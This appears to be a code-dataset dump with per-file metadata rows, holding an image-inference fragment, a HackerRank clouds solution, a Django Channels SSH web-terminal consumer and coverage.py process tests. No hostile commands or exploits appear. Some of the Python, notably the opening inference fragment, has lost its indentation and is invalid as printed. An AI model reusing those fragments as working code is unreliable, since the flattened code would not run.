def infer(settings, image_path):
def batch_reader():
img = Image.open(image_path)
if img.mode == 'L':
img = img.convert('RGB')
im_width, im_height = img.size
if settings.resize_width and settings.resize_height:
img = img.resize((settings.resize_width, settings.resize_height),
Image.ANTIALIAS)
img = np.array(img)
img = to_chw_bgr(img)
img = img.astype('float32')
img -= settings.img_mean
img = img * settings.scale
return np.array([img])
return batch_reader
| 35.085546 | 79 | 0.552211 |
4a1e61b58e1cc25fec37e8b55deca9375084b422 | 1,299 | py | Python | solving/lists/clouds/clouds.py | williamlagos/chess | 7470479e352bf6fa28215e745af8c42dc20d7a1f | [
"MIT"
] | null | null | null | solving/lists/clouds/clouds.py | williamlagos/chess | 7470479e352bf6fa28215e745af8c42dc20d7a1f | [
"MIT"
] | 4 | 2020-04-23T23:17:54.000Z | 2021-07-06T17:44:45.000Z | solving/lists/clouds/clouds.py | williamlagos/chess | 7470479e352bf6fa28215e745af8c42dc20d7a1f | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import math
import os
import random
import re
import sys
# Complete the jumpingOnClouds function below.
def jumpingOnClouds(c):
jumps = 0
# Constraints check
clouds_quantity = len(c)
if clouds_quantity < 2 or clouds_quantity > 100:
return jumps
    # The first and last clouds must both be safe (0)
    if c[0] != 0 or c[-1] != 0:
        return jumps
ones = c.count(1)
zeroes = c.count(0)
clouds = ones + zeroes
if ones >= zeroes:
return jumps
if clouds != clouds_quantity:
return jumps
    # Greedy traversal of the clouds
i = 0
last = clouds - 1
while i < last:
        # Prefer the two-cloud jump whenever the cloud two ahead is safe
one_step = i + 1
two_step = i + 2
if two_step <= last and c[two_step] == 0:
jumps += 1
i += 2
        # Otherwise fall back to the adjacent cloud
elif one_step <= last and c[one_step] == 0:
jumps += 1
i += 1
        # Neither step lands on a safe cloud, so end the loop
else:
i = last
return jumps
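# Editor's sketch (not part of the original solution): the classic sample
# input 0 0 1 0 0 1 0 needs four jumps (0 -> 1 -> 3 -> 4 -> 6).
def _jumping_on_clouds_example():
    """Return the jump count for the sample cloud layout (expected: 4)."""
    return jumpingOnClouds([0, 0, 1, 0, 0, 1, 0])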
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
# fptr = open('./output.txt', 'w')
n = int(input())
c = list(map(int, input().rstrip().split()))
result = jumpingOnClouds(c)
fptr.write(str(result) + '\n')
fptr.close()
| 23.196429 | 58 | 0.555812 |
4a1e62d375f8e57f33e2d021881a807aa2b7a7ba | 2,851 | py | Python | manage_app/consumers.py | radekska/django-network-controller | 6bcb847cbe1efa7dee118974de5e49b4f411e5da | [
"MIT"
] | null | null | null | manage_app/consumers.py | radekska/django-network-controller | 6bcb847cbe1efa7dee118974de5e49b4f411e5da | [
"MIT"
] | null | null | null | manage_app/consumers.py | radekska/django-network-controller | 6bcb847cbe1efa7dee118974de5e49b4f411e5da | [
"MIT"
] | null | null | null | import json
import logging
import asyncio
from django.contrib.auth.models import User
from asgiref.sync import sync_to_async
from channels.consumer import AsyncConsumer
from manage_app.backend.ConnectionHandler import SSHConnectionHandler
from config_app.models import ConfigParameters
from manage_app.models import DeviceModel
class SSHConsumer(AsyncConsumer):
"""
    This class inherits from AsyncConsumer (channels.consumer) and is responsible for handling all
    asynchronous traffic coming from the JavaScript frontend web socket (the xterm SSH web terminal),
    as well as forwarding it on to the network device.
"""
socket_opened = False
async def websocket_connect(self, event):
self.user = self.scope["user"]
logging.warning(f"Web socket opened - {event}.")
await self.send({
'type': 'websocket.accept',
})
self.device_model = await sync_to_async(DeviceModel.objects.get, thread_sensitive=True)(ssh_session=True)
self.device_id = self.device_model.id
self.user_model = await sync_to_async(User.objects.get, thread_sensitive=True)(
username=self.user)
self.access_config_model = await sync_to_async(ConfigParameters.objects.filter, thread_sensitive=True)(
access_config_id__isnull=False)
self.access_config_model = await sync_to_async(self.access_config_model.get, thread_sensitive=True)(
user=self.user_model)
self.access_config_id = self.access_config_model.access_config_id
initial_data = dict(response=f'\r\nOpening SSH session to {self.device_model.hostname}... \r\n')
await self.send({
'type': 'websocket.send',
'text': json.dumps(initial_data)
})
self.SSHConnection = await SSHConnectionHandler.initialize_connection(self.device_id, self.access_config_id)
data = await self.SSHConnection.read_from_connection(self.SSHConnection)
await asyncio.sleep(1)
await self.send({
'type': 'websocket.send',
'text': json.dumps(data),
})
async def websocket_receive(self, event):
command = event.get('text', None)
responded_lines, response_and_prompt = await asyncio.gather(
self.SSHConnection.write_to_connection(self.SSHConnection, command),
self.SSHConnection.read_from_connection(self.SSHConnection))
if response_and_prompt is not False:
await self.send({
'type': 'websocket.send',
'text': json.dumps(response_and_prompt)
})
async def websocket_disconnect(self, event):
self.device_model.ssh_session = False
await sync_to_async(self.device_model.save, thread_sensitive=True)()
logging.warning("connection closed", event)
| 37.513158 | 144 | 0.69765 |
4a1e63488537d4a13902eef2374eae9a66ed55ce | 59,334 | py | Python | tests/test_process.py | davidszotten/coveragepy | c09c2c203286db3cae1148bd02b1db9a9d524af1 | [
"Apache-2.0"
] | null | null | null | tests/test_process.py | davidszotten/coveragepy | c09c2c203286db3cae1148bd02b1db9a9d524af1 | [
"Apache-2.0"
] | null | null | null | tests/test_process.py | davidszotten/coveragepy | c09c2c203286db3cae1148bd02b1db9a9d524af1 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
# Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://github.com/nedbat/coveragepy/blob/master/NOTICE.txt
"""Tests for process behavior of coverage.py."""
import distutils.sysconfig
import glob
import os
import os.path
import re
import sys
import textwrap
import time
from xml.etree import ElementTree
import pytest
import coverage
from coverage import env
from coverage.data import line_counts
from coverage.files import python_reported_file
from coverage.misc import output_encoding
from tests.coveragetest import CoverageTest
from tests.helpers import re_lines
class ProcessTest(CoverageTest):
"""Tests of the per-process behavior of coverage.py."""
def test_save_on_exit(self):
self.make_file("mycode.py", """\
h = "Hello"
w = "world"
""")
self.assert_doesnt_exist(".coverage")
self.run_command("coverage run mycode.py")
self.assert_exists(".coverage")
def test_environment(self):
# Checks that we can import modules from the tests directory at all!
self.make_file("mycode.py", """\
import covmod1
import covmodzip1
a = 1
print('done')
""")
self.assert_doesnt_exist(".coverage")
out = self.run_command("coverage run mycode.py")
self.assert_exists(".coverage")
self.assertEqual(out, 'done\n')
def make_b_or_c_py(self):
"""Create b_or_c.py, used in a few of these tests."""
# "b_or_c.py b" will run 6 lines.
# "b_or_c.py c" will run 7 lines.
# Together, they run 8 lines.
self.make_file("b_or_c.py", """\
import sys
a = 1
if sys.argv[1] == 'b':
b = 1
else:
c = 1
c2 = 2
d = 1
print('done')
""")
def test_combine_parallel_data(self):
self.make_b_or_c_py()
out = self.run_command("coverage run -p b_or_c.py b")
self.assertEqual(out, 'done\n')
self.assert_doesnt_exist(".coverage")
self.assert_file_count(".coverage.*", 1)
out = self.run_command("coverage run -p b_or_c.py c")
self.assertEqual(out, 'done\n')
self.assert_doesnt_exist(".coverage")
# After two -p runs, there should be two .coverage.machine.123 files.
self.assert_file_count(".coverage.*", 2)
# Combine the parallel coverage data files into .coverage .
self.run_command("coverage combine")
self.assert_exists(".coverage")
# After combining, there should be only the .coverage file.
self.assert_file_count(".coverage.*", 0)
# Read the coverage file and see that b_or_c.py has all 8 lines
# executed.
data = coverage.CoverageData()
data.read()
self.assertEqual(line_counts(data)['b_or_c.py'], 8)
# Running combine again should fail, because there are no parallel data
# files to combine.
status, out = self.run_command_status("coverage combine")
self.assertEqual(status, 1)
self.assertEqual(out, "No data to combine\n")
# And the originally combined data is still there.
data = coverage.CoverageData()
data.read()
self.assertEqual(line_counts(data)['b_or_c.py'], 8)
def test_combine_parallel_data_with_a_corrupt_file(self):
self.make_b_or_c_py()
out = self.run_command("coverage run -p b_or_c.py b")
self.assertEqual(out, 'done\n')
self.assert_doesnt_exist(".coverage")
self.assert_file_count(".coverage.*", 1)
out = self.run_command("coverage run -p b_or_c.py c")
self.assertEqual(out, 'done\n')
self.assert_doesnt_exist(".coverage")
# After two -p runs, there should be two .coverage.machine.123 files.
self.assert_file_count(".coverage.*", 2)
# Make a bogus data file.
self.make_file(".coverage.bad", "This isn't a coverage data file.")
# Combine the parallel coverage data files into .coverage .
out = self.run_command("coverage combine")
self.assert_exists(".coverage")
self.assert_exists(".coverage.bad")
warning_regex = (
r"(" # JSON message:
r"Coverage.py warning: Couldn't read data from '.*\.coverage\.bad': "
r"CoverageException: Doesn't seem to be a coverage\.py data file"
r"|" # SQL message:
r"Coverage.py warning: Couldn't use data file '.*\.coverage\.bad': "
r"file (is encrypted or )?is not a database"
r")"
)
self.assertRegex(out, warning_regex)
# After combining, those two should be the only data files.
self.assert_file_count(".coverage.*", 1)
# Read the coverage file and see that b_or_c.py has all 8 lines
# executed.
data = coverage.CoverageData()
data.read()
self.assertEqual(line_counts(data)['b_or_c.py'], 8)
def test_combine_no_usable_files(self):
# https://bitbucket.org/ned/coveragepy/issues/629/multiple-use-of-combine-leads-to-empty
self.make_b_or_c_py()
out = self.run_command("coverage run b_or_c.py b")
self.assertEqual(out, 'done\n')
self.assert_exists(".coverage")
self.assert_file_count(".coverage.*", 0)
# Make bogus data files.
self.make_file(".coverage.bad1", "This isn't a coverage data file.")
self.make_file(".coverage.bad2", "This isn't a coverage data file.")
# Combine the parallel coverage data files into .coverage, but nothing is readable.
status, out = self.run_command_status("coverage combine")
self.assertEqual(status, 1)
for n in "12":
self.assert_exists(".coverage.bad{}".format(n))
warning_regex = (
r"(" # JSON message:
r"Coverage.py warning: Couldn't read data from '.*\.coverage\.bad{0}': "
r"CoverageException: Doesn't seem to be a coverage\.py data file"
r"|" # SQL message:
r"Coverage.py warning: Couldn't use data file '.*\.coverage.bad{0}': "
r"file (is encrypted or )?is not a database"
r")"
.format(n)
)
self.assertRegex(out, warning_regex)
self.assertRegex(out, r"No usable data files")
# After combining, we should have a main file and two parallel files.
self.assert_exists(".coverage")
self.assert_file_count(".coverage.*", 2)
# Read the coverage file and see that b_or_c.py has 6 lines
# executed (we only did b, not c).
data = coverage.CoverageData()
data.read()
self.assertEqual(line_counts(data)['b_or_c.py'], 6)
def test_combine_parallel_data_in_two_steps(self):
self.make_b_or_c_py()
out = self.run_command("coverage run -p b_or_c.py b")
self.assertEqual(out, 'done\n')
self.assert_doesnt_exist(".coverage")
self.assert_file_count(".coverage.*", 1)
# Combine the (one) parallel coverage data file into .coverage .
self.run_command("coverage combine")
self.assert_exists(".coverage")
self.assert_file_count(".coverage.*", 0)
out = self.run_command("coverage run -p b_or_c.py c")
self.assertEqual(out, 'done\n')
self.assert_exists(".coverage")
self.assert_file_count(".coverage.*", 1)
# Combine the parallel coverage data files into .coverage .
self.run_command("coverage combine --append")
self.assert_exists(".coverage")
# After combining, there should be only the .coverage file.
self.assert_file_count(".coverage.*", 0)
# Read the coverage file and see that b_or_c.py has all 8 lines
# executed.
data = coverage.CoverageData()
data.read()
self.assertEqual(line_counts(data)['b_or_c.py'], 8)
def test_combine_parallel_data_no_append(self):
self.make_b_or_c_py()
out = self.run_command("coverage run -p b_or_c.py b")
self.assertEqual(out, 'done\n')
self.assert_doesnt_exist(".coverage")
self.assert_file_count(".coverage.*", 1)
# Combine the (one) parallel coverage data file into .coverage .
self.run_command("coverage combine")
self.assert_exists(".coverage")
self.assert_file_count(".coverage.*", 0)
out = self.run_command("coverage run -p b_or_c.py c")
self.assertEqual(out, 'done\n')
self.assert_exists(".coverage")
self.assert_file_count(".coverage.*", 1)
# Combine the parallel coverage data files into .coverage, but don't
# use the data in .coverage already.
self.run_command("coverage combine")
self.assert_exists(".coverage")
# After combining, there should be only the .coverage file.
self.assert_file_count(".coverage.*", 0)
# Read the coverage file and see that b_or_c.py has only 7 lines
# because we didn't keep the data from running b.
data = coverage.CoverageData()
data.read()
self.assertEqual(line_counts(data)['b_or_c.py'], 7)
def test_append_data(self):
self.make_b_or_c_py()
out = self.run_command("coverage run b_or_c.py b")
self.assertEqual(out, 'done\n')
self.assert_exists(".coverage")
self.assert_file_count(".coverage.*", 0)
out = self.run_command("coverage run --append b_or_c.py c")
self.assertEqual(out, 'done\n')
self.assert_exists(".coverage")
self.assert_file_count(".coverage.*", 0)
# Read the coverage file and see that b_or_c.py has all 8 lines
# executed.
data = coverage.CoverageData()
data.read()
self.assertEqual(line_counts(data)['b_or_c.py'], 8)
def test_append_data_with_different_file(self):
self.make_b_or_c_py()
self.make_file(".coveragerc", """\
[run]
data_file = .mycovdata
""")
out = self.run_command("coverage run b_or_c.py b")
self.assertEqual(out, 'done\n')
self.assert_doesnt_exist(".coverage")
self.assert_exists(".mycovdata")
out = self.run_command("coverage run --append b_or_c.py c")
self.assertEqual(out, 'done\n')
self.assert_doesnt_exist(".coverage")
self.assert_exists(".mycovdata")
# Read the coverage file and see that b_or_c.py has all 8 lines
# executed.
data = coverage.CoverageData(".mycovdata")
data.read()
self.assertEqual(line_counts(data)['b_or_c.py'], 8)
def test_append_can_create_a_data_file(self):
self.make_b_or_c_py()
out = self.run_command("coverage run --append b_or_c.py b")
self.assertEqual(out, 'done\n')
self.assert_exists(".coverage")
self.assert_file_count(".coverage.*", 0)
# Read the coverage file and see that b_or_c.py has only 6 lines
# executed.
data = coverage.CoverageData()
data.read()
self.assertEqual(line_counts(data)['b_or_c.py'], 6)
def test_combine_with_rc(self):
self.make_b_or_c_py()
self.make_file(".coveragerc", """\
[run]
source = .
parallel = true
""")
out = self.run_command("coverage run b_or_c.py b")
self.assertEqual(out, 'done\n')
self.assert_doesnt_exist(".coverage")
out = self.run_command("coverage run b_or_c.py c")
self.assertEqual(out, 'done\n')
self.assert_doesnt_exist(".coverage")
# After two runs, there should be two .coverage.machine.123 files.
self.assert_file_count(".coverage.*", 2)
# Combine the parallel coverage data files into .coverage .
self.run_command("coverage combine")
self.assert_exists(".coverage")
self.assert_exists(".coveragerc")
# After combining, there should be only the .coverage file.
self.assert_file_count(".coverage.*", 0)
# Read the coverage file and see that b_or_c.py has all 8 lines
# executed.
data = coverage.CoverageData()
data.read()
self.assertEqual(line_counts(data)['b_or_c.py'], 8)
# Reporting should still work even with the .rc file
out = self.run_command("coverage report")
self.assertMultiLineEqual(out, textwrap.dedent("""\
Name Stmts Miss Cover
-------------------------------
b_or_c.py 8 0 100%
"""))
def test_combine_with_aliases(self):
self.make_file("d1/x.py", """\
a = 1
b = 2
print("%s %s" % (a, b))
""")
self.make_file("d2/x.py", """\
# 1
# 2
# 3
c = 4
d = 5
print("%s %s" % (c, d))
""")
self.make_file(".coveragerc", """\
[run]
source = .
parallel = True
[paths]
source =
src
*/d1
*/d2
""")
out = self.run_command("coverage run " + os.path.normpath("d1/x.py"))
self.assertEqual(out, '1 2\n')
out = self.run_command("coverage run " + os.path.normpath("d2/x.py"))
self.assertEqual(out, '4 5\n')
self.assert_file_count(".coverage.*", 2)
self.run_command("coverage combine")
self.assert_exists(".coverage")
# After combining, there should be only the .coverage file.
self.assert_file_count(".coverage.*", 0)
# Read the coverage data file and see that the two different x.py
# files have been combined together.
data = coverage.CoverageData()
data.read()
summary = line_counts(data, fullpath=True)
self.assertEqual(len(summary), 1)
actual = os.path.normcase(os.path.abspath(list(summary.keys())[0]))
expected = os.path.normcase(os.path.abspath('src/x.py'))
self.assertEqual(expected, actual)
self.assertEqual(list(summary.values())[0], 6)
def test_erase_parallel(self):
self.make_file(".coveragerc", """\
[run]
data_file = data.dat
parallel = True
""")
self.make_file("data.dat")
self.make_file("data.dat.fooey")
self.make_file("data.dat.gooey")
self.make_file(".coverage")
self.run_command("coverage erase")
self.assert_doesnt_exist("data.dat")
self.assert_doesnt_exist("data.dat.fooey")
self.assert_doesnt_exist("data.dat.gooey")
self.assert_exists(".coverage")
def test_missing_source_file(self):
# Check what happens if the source is missing when reporting happens.
self.make_file("fleeting.py", """\
s = 'goodbye, cruel world!'
""")
self.run_command("coverage run fleeting.py")
os.remove("fleeting.py")
out = self.run_command("coverage html -d htmlcov")
self.assertRegex(out, "No source for code: '.*fleeting.py'")
self.assertNotIn("Traceback", out)
# It happens that the code paths are different for *.py and other
# files, so try again with no extension.
self.make_file("fleeting", """\
s = 'goodbye, cruel world!'
""")
self.run_command("coverage run fleeting")
os.remove("fleeting")
status, out = self.run_command_status("coverage html -d htmlcov")
self.assertRegex(out, "No source for code: '.*fleeting'")
self.assertNotIn("Traceback", out)
self.assertEqual(status, 1)
def test_running_missing_file(self):
status, out = self.run_command_status("coverage run xyzzy.py")
self.assertRegex(out, "No file to run: .*xyzzy.py")
self.assertNotIn("raceback", out)
self.assertNotIn("rror", out)
self.assertEqual(status, 1)
def test_code_throws(self):
self.make_file("throw.py", """\
def f1():
raise Exception("hey!")
def f2():
f1()
f2()
""")
# The important thing is for "coverage run" and "python" to report the
# same traceback.
status, out = self.run_command_status("coverage run throw.py")
out2 = self.run_command("python throw.py")
if env.PYPY:
# Pypy has an extra frame in the traceback for some reason
out2 = re_lines(out2, "toplevel", match=False)
self.assertMultiLineEqual(out, out2)
# But also make sure that the output is what we expect.
path = python_reported_file('throw.py')
msg = 'File "{}", line 5,? in f2'.format(re.escape(path))
self.assertRegex(out, msg)
self.assertIn('raise Exception("hey!")', out)
self.assertEqual(status, 1)
def test_code_exits(self):
self.make_file("exit.py", """\
import sys
def f1():
print("about to exit..")
sys.exit(17)
def f2():
f1()
f2()
""")
# The important thing is for "coverage run" and "python" to have the
# same output. No traceback.
status, out = self.run_command_status("coverage run exit.py")
status2, out2 = self.run_command_status("python exit.py")
self.assertMultiLineEqual(out, out2)
self.assertMultiLineEqual(out, "about to exit..\n")
self.assertEqual(status, status2)
self.assertEqual(status, 17)
def test_code_exits_no_arg(self):
self.make_file("exit_none.py", """\
import sys
def f1():
print("about to exit quietly..")
sys.exit()
f1()
""")
status, out = self.run_command_status("coverage run exit_none.py")
status2, out2 = self.run_command_status("python exit_none.py")
self.assertMultiLineEqual(out, out2)
self.assertMultiLineEqual(out, "about to exit quietly..\n")
self.assertEqual(status, status2)
self.assertEqual(status, 0)
def test_fork(self):
if not hasattr(os, 'fork'):
self.skipTest("Can't test os.fork since it doesn't exist.")
self.make_file("fork.py", """\
import os
def child():
print('Child!')
def main():
ret = os.fork()
if ret == 0:
child()
else:
os.waitpid(ret, 0)
main()
""")
out = self.run_command("coverage run -p fork.py")
self.assertEqual(out, 'Child!\n')
self.assert_doesnt_exist(".coverage")
# After running the forking program, there should be two
# .coverage.machine.123 files.
self.assert_file_count(".coverage.*", 2)
# The two data files should have different random numbers at the end of
# the file name.
data_files = glob.glob(".coverage.*")
nums = set(name.rpartition(".")[-1] for name in data_files)
self.assertEqual(len(nums), 2, "Same random: %s" % (data_files,))
# Combine the parallel coverage data files into .coverage .
self.run_command("coverage combine")
self.assert_exists(".coverage")
# After combining, there should be only the .coverage file.
self.assert_file_count(".coverage.*", 0)
data = coverage.CoverageData()
data.read()
self.assertEqual(line_counts(data)['fork.py'], 9)
def test_warnings_during_reporting(self):
# While fixing issue #224, the warnings were being printed far too
# often. Make sure they're not any more.
self.make_file("hello.py", """\
import sys, os, the_other
print("Hello")
""")
self.make_file("the_other.py", """\
print("What?")
""")
self.make_file(".coveragerc", """\
[run]
source =
.
xyzzy
""")
self.run_command("coverage run hello.py")
out = self.run_command("coverage html")
self.assertEqual(out.count("Module xyzzy was never imported."), 0)
def test_warns_if_never_run(self):
# Note: the name of the function can't have "warning" in it, or the
# absolute path of the file will have "warning" in it, and an assertion
# will fail.
out = self.run_command("coverage run i_dont_exist.py")
path = python_reported_file('i_dont_exist.py')
self.assertIn("No file to run: '{}'".format(path), out)
self.assertNotIn("warning", out)
self.assertNotIn("Exception", out)
out = self.run_command("coverage run -m no_such_module")
self.assertTrue(
("No module named no_such_module" in out) or
("No module named 'no_such_module'" in out)
)
self.assertNotIn("warning", out)
self.assertNotIn("Exception", out)
def test_warnings_trace_function_changed_with_threads(self):
# https://bitbucket.org/ned/coveragepy/issue/164
if env.METACOV:
self.skipTest("Can't test tracers changing during metacoverage")
self.make_file("bug164.py", """\
import threading
import time
class MyThread (threading.Thread):
def run(self):
print("Hello")
thr = MyThread()
thr.start()
thr.join()
""")
out = self.run_command("coverage run --timid bug164.py")
self.assertIn("Hello\n", out)
self.assertNotIn("warning", out)
def test_warning_trace_function_changed(self):
self.make_file("settrace.py", """\
import sys
print("Hello")
sys.settrace(None)
print("Goodbye")
""")
out = self.run_command("coverage run --timid settrace.py")
self.assertIn("Hello\n", out)
self.assertIn("Goodbye\n", out)
self.assertIn("Trace function changed", out)
def test_timid(self):
# Test that the --timid command line argument properly swaps the tracer
# function for a simpler one.
#
# This is complicated by the fact that the tests are run twice for each
# version: once with a compiled C-based trace function, and once without
# it, to also test the Python trace function. So this test has to examine
# an environment variable set in igor.py to know whether to expect to see
# the C trace function or not.
# When meta-coverage testing, this test doesn't work, because it finds
# coverage.py's own trace function.
if os.environ.get('COVERAGE_COVERAGE', ''):
self.skipTest("Can't test timid during coverage measurement.")
self.make_file("showtrace.py", """\
# Show the current frame's trace function, so that we can test what the
# command-line options do to the trace function used.
import sys
# Show what the trace function is. If a C-based function is used, then f_trace
# may be None.
trace_fn = sys._getframe(0).f_trace
if trace_fn is None:
trace_name = "None"
else:
# Get the name of the tracer class. Py3k has a different way to get it.
try:
trace_name = trace_fn.im_class.__name__
except AttributeError:
try:
trace_name = trace_fn.__self__.__class__.__name__
except AttributeError:
# A C-based function could also manifest as an f_trace value
# which doesn't have im_class or __self__.
trace_name = trace_fn.__class__.__name__
print(trace_name)
""")
# When running without coverage, no trace function
py_out = self.run_command("python showtrace.py")
self.assertEqual(py_out, "None\n")
cov_out = self.run_command("coverage run showtrace.py")
if os.environ.get('COVERAGE_TEST_TRACER', 'c') == 'c':
# If the C trace function is being tested, then regular running should have
# the C function, which registers itself as f_trace.
self.assertEqual(cov_out, "CTracer\n")
else:
# If the Python trace function is being tested, then regular running will
# also show the Python function.
self.assertEqual(cov_out, "PyTracer\n")
# When running timidly, the trace function is always Python.
timid_out = self.run_command("coverage run --timid showtrace.py")
self.assertEqual(timid_out, "PyTracer\n")
def test_warn_preimported(self):
self.make_file("hello.py", """\
import goodbye
import coverage
cov = coverage.Coverage(include=["good*"], check_preimported=True)
cov.start()
print(goodbye.f())
cov.stop()
""")
self.make_file("goodbye.py", """\
def f():
return "Goodbye!"
""")
goodbye_path = os.path.abspath("goodbye.py")
out = self.run_command("python hello.py")
self.assertIn("Goodbye!", out)
msg = (
"Coverage.py warning: "
"Already imported a file that will be measured: {0} "
"(already-imported)").format(goodbye_path)
self.assertIn(msg, out)
@pytest.mark.expensive
def test_fullcoverage(self): # pragma: no metacov
if env.PY2: # This doesn't work on Python 2.
self.skipTest("fullcoverage doesn't work on Python 2.")
# It only works with the C tracer, and if we aren't measuring ourselves.
if not env.C_TRACER or env.METACOV:
self.skipTest("fullcoverage only works with the C tracer.")
# fullcoverage is a trick to get stdlib modules measured from
# the very beginning of the process. Here we import os and
# then check how many lines are measured.
self.make_file("getenv.py", """\
import os
print("FOOEY == %s" % os.getenv("FOOEY"))
""")
fullcov = os.path.join(
os.path.dirname(coverage.__file__), "fullcoverage"
)
self.set_environ("FOOEY", "BOO")
self.set_environ("PYTHONPATH", fullcov)
out = self.run_command("python -m coverage run -L getenv.py")
self.assertEqual(out, "FOOEY == BOO\n")
data = coverage.CoverageData()
data.read()
# The actual number of executed lines in os.py when it's
# imported is 120 or so. Just running os.getenv executes
# about 5.
self.assertGreater(line_counts(data)['os.py'], 50)
def test_lang_c(self):
if env.JYTHON:
# Jython as of 2.7.1rc3 won't compile a filename that isn't utf8.
self.skipTest("Jython can't handle this test")
if env.PYPY and env.PY3 and env.PYPYVERSION[:3] >= (7, 1, 1): # pragma: obscure
# https://bitbucket.org/pypy/pypy/issues/3074/compile-fails-on-non-ascii-filename-if
self.skipTest("Avoid getfilesystemencoding problem on pypy3")
# LANG=C forces getfilesystemencoding on Linux to 'ascii', which causes
# failures with non-ascii file names. We don't want to make a real file
# with strange characters, though, because that gets the test runners
# tangled up. This will isolate the concerns to the coverage.py code.
# https://bitbucket.org/ned/coveragepy/issues/533/exception-on-unencodable-file-name
self.make_file("weird_file.py", r"""
globs = {}
code = "a = 1\nb = 2\n"
exec(compile(code, "wut\xe9\xea\xeb\xec\x01\x02.py", 'exec'), globs)
print(globs['a'])
print(globs['b'])
""")
self.set_environ("LANG", "C")
out = self.run_command("coverage run weird_file.py")
self.assertEqual(out, "1\n2\n")
def test_deprecation_warnings(self):
# Test that coverage doesn't trigger deprecation warnings.
# https://bitbucket.org/ned/coveragepy/issue/305/pendingdeprecationwarning-the-imp-module
self.make_file("allok.py", """\
import warnings
warnings.simplefilter('default')
import coverage
print("No warnings!")
""")
# Some of our testing infrastructure can issue warnings.
# Turn it all off for the sub-process.
self.del_environ("COVERAGE_TESTING")
out = self.run_command("python allok.py")
self.assertEqual(out, "No warnings!\n")
def test_run_twice(self):
# https://bitbucket.org/ned/coveragepy/issue/353/40a3-introduces-an-unexpected-third-case
self.make_file("foo.py", """\
def foo():
pass
""")
self.make_file("run_twice.py", """\
import sys
import coverage
for i in [1, 2]:
sys.stderr.write("Run %s\\n" % i)
inst = coverage.Coverage(source=['foo'])
inst.load()
inst.start()
import foo
inst.stop()
inst.save()
""")
out = self.run_command("python run_twice.py")
self.assertEqual(
out,
"Run 1\n"
"Run 2\n"
"Coverage.py warning: Module foo was previously imported, but not measured "
"(module-not-measured)\n"
)
def test_module_name(self):
# https://bitbucket.org/ned/coveragepy/issues/478/help-shows-silly-program-name-when-running
out = self.run_command("python -m coverage")
self.assertIn("Use 'coverage help' for help", out)
TRY_EXECFILE = os.path.join(os.path.dirname(__file__), "modules/process_test/try_execfile.py")
class EnvironmentTest(CoverageTest):
"""Tests using try_execfile.py to test the execution environment."""
def assert_tryexecfile_output(self, expected, actual):
"""Assert that the output we got is a successful run of try_execfile.py.
`expected` and `actual` must be the same, modulo a few slight known
platform differences.
"""
# First, is this even credible try_execfile.py output?
self.assertIn('"DATA": "xyzzy"', actual)
if env.JYTHON: # pragma: only jython
# Argv0 is different for Jython, remove that from the comparison.
expected = re_lines(expected, r'\s+"argv0":', match=False)
actual = re_lines(actual, r'\s+"argv0":', match=False)
self.assertMultiLineEqual(expected, actual)
def test_coverage_run_is_like_python(self):
with open(TRY_EXECFILE) as f:
self.make_file("run_me.py", f.read())
expected = self.run_command("python run_me.py")
actual = self.run_command("coverage run run_me.py")
self.assert_tryexecfile_output(expected, actual)
def test_coverage_run_far_away_is_like_python(self):
with open(TRY_EXECFILE) as f:
self.make_file("sub/overthere/prog.py", f.read())
expected = self.run_command("python sub/overthere/prog.py")
actual = self.run_command("coverage run sub/overthere/prog.py")
self.assert_tryexecfile_output(expected, actual)
def test_coverage_run_dashm_is_like_python_dashm(self):
# These -m commands assume the coverage tree is on the path.
expected = self.run_command("python -m process_test.try_execfile")
actual = self.run_command("coverage run -m process_test.try_execfile")
self.assert_tryexecfile_output(expected, actual)
def test_coverage_run_dir_is_like_python_dir(self):
if env.PYVERSION == (3, 5, 4, 'final', 0): # pragma: obscure
self.skipTest("3.5.4 broke this: https://bugs.python.org/issue32551")
with open(TRY_EXECFILE) as f:
self.make_file("with_main/__main__.py", f.read())
expected = self.run_command("python with_main")
actual = self.run_command("coverage run with_main")
# PyPy includes the current directory in the path when running a
# directory, while CPython and coverage.py do not. Exclude that from
# the comparison also...
if env.PYPY:
ignored = re.escape(os.getcwd())
expected = re_lines(expected, ignored, match=False)
actual = re_lines(actual, ignored, match=False)
self.assert_tryexecfile_output(expected, actual)
def test_coverage_run_dashm_dir_no_init_is_like_python(self):
with open(TRY_EXECFILE) as f:
self.make_file("with_main/__main__.py", f.read())
expected = self.run_command("python -m with_main")
actual = self.run_command("coverage run -m with_main")
if env.PY2:
assert expected.endswith("No module named with_main\n")
assert actual.endswith("No module named with_main\n")
else:
self.assert_tryexecfile_output(expected, actual)
def test_coverage_run_dashm_dir_with_init_is_like_python(self):
if env.PY2:
self.skipTest("Python 2 runs __main__ twice, I can't be bothered to make it work.")
with open(TRY_EXECFILE) as f:
self.make_file("with_main/__main__.py", f.read())
self.make_file("with_main/__init__.py", "")
expected = self.run_command("python -m with_main")
actual = self.run_command("coverage run -m with_main")
self.assert_tryexecfile_output(expected, actual)
def test_coverage_run_dashm_equal_to_doubledashsource(self):
"""regression test for #328
When imported by -m, a module's __name__ is __main__, but we need the
--source machinery to know and respect the original name.
"""
# These -m commands assume the coverage tree is on the path.
expected = self.run_command("python -m process_test.try_execfile")
actual = self.run_command(
"coverage run --source process_test.try_execfile -m process_test.try_execfile"
)
self.assert_tryexecfile_output(expected, actual)
def test_coverage_run_dashm_superset_of_doubledashsource(self):
"""Edge case: --source foo -m foo.bar"""
# Ugh: without this config file, we'll get a warning about
# Coverage.py warning: Module process_test was previously imported,
# but not measured (module-not-measured)
#
# This is because process_test/__init__.py is imported while looking
# for process_test.try_execfile. That import happens while setting
# sys.path before start() is called.
self.make_file(".coveragerc", """\
[run]
disable_warnings = module-not-measured
""")
# These -m commands assume the coverage tree is on the path.
expected = self.run_command("python -m process_test.try_execfile")
actual = self.run_command(
"coverage run --source process_test -m process_test.try_execfile"
)
self.assert_tryexecfile_output(expected, actual)
st, out = self.run_command_status("coverage report")
self.assertEqual(st, 0)
self.assertEqual(self.line_count(out), 6, out)
def test_coverage_run_script_imports_doubledashsource(self):
# This file imports try_execfile, which compiles it to .pyc, so the
# first run will have __file__ == "try_execfile.py" and the second will
# have __file__ == "try_execfile.pyc", which throws off the comparison.
# Setting dont_write_bytecode True stops the compilation to .pyc and
# keeps the test working.
self.make_file("myscript", """\
import sys; sys.dont_write_bytecode = True
import process_test.try_execfile
""")
expected = self.run_command("python myscript")
